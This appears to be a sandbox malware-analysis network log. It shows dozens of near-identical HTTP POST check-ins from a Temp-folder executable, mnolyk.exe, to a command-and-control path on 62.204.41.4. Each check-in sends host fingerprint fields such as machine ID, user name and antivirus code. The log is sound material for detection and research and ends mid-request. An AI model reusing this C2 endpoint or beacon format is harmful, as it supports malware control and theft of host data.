                            Feb 8, 2023 17:38:36.694907904 CET | 435 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.759859085 CET | 435 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            247 | 192.168.2.4 | 49942 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:36.933202028 CET | 436 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.998570919 CET | 436 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            248 | 192.168.2.4 | 49943 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:37.183501005 CET | 437 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.249094009 CET | 437 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            249 | 192.168.2.4 | 49944 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:37.430399895 CET | 438 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.494013071 CET | 438 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            25 | 192.168.2.4 | 49720 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:30.557563066 CET | 214 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.623967886 CET | 214 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            250 | 192.168.2.4 | 49945 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:37.668634892 CET | 439 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.734601021 CET | 439 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            251 | 192.168.2.4 | 49946 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:37.915360928 CET | 440 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.981039047 CET | 440 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            252 | 192.168.2.4 | 49947 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:38.153086901 CET | 441 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.219619036 CET | 441 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            253 | 192.168.2.4 | 49948 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:38.400423050 CET | 442 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.465370893 CET | 442 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            254 | 192.168.2.4 | 49949 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:38.632550001 CET | 443 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.698424101 CET | 443 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            255 | 192.168.2.4 | 49950 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:38.867192030 CET | 444 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:38.931837082 CET | 444 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            256 | 192.168.2.4 | 49951 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:39.117122889 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.184155941 CET | 445 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            257 | 192.168.2.4 | 49952 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:39.350317001 CET | 445 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.413841963 CET | 446 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            258 | 192.168.2.4 | 49953 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:39.587593079 CET | 447 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.652129889 CET | 447 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            259 | 192.168.2.4 | 49954 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:39.826366901 CET | 448 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:39.895251036 CET | 448 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            26 | 192.168.2.4 | 49721 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:31.055128098 CET | 215 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:31.121349096 CET | 215 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            260 | 192.168.2.4 | 49955 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:40.070472002 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.136811018 CET | 449 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            261 | 192.168.2.4 | 49956 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:40.308350086 CET | 450 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.374418974 CET   450   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            262   192.168.2.4   49957   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:40.557977915 CET   451   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.624577045 CET   451   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            263   192.168.2.4   49958   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:40.811347008 CET   452   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:40.875916958 CET   452   IN   HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID   Source IP   Source Port   Destination IP   Destination Port   Process
                            264   192.168.2.4   49959   62.204.41.4   80   C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp   kBytes transferred   Direction   Data
                            Feb 8, 2023 17:38:41.059223890 CET   453   OUT   POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
